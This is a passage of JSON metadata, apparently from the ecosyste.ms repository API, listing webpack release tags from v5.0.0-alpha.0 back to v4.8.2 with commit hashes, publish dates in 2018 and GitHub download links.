"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_u